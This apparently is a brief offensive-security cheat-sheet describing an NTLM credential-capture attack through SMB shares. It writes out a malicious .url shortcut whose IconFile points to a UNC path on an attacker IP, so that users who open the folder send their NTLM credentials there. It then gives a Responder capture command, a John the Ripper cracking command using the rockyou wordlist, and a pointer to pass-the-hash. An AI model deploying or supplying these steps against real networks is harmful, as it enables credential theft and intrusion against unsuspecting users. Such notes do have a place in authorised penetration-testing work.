Flooding Attack
This method is using Internet Icon file saved to smb shares connect to responder. The idea is every user access the folder, would reload the Internet Icon and in case the file is in the smb shares that makes the computer request access with sending the ntlm creds to the icon url.
file (testing.url)
[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\<attacker ip>\%USERNAME%.icon
IconIndex=1
Responder
responder -I tun0 -v
Next?
Crack the hash
john hash.file --wordlist=/usr/share/wordlists/rockyou.txt
pass the hash
Last updated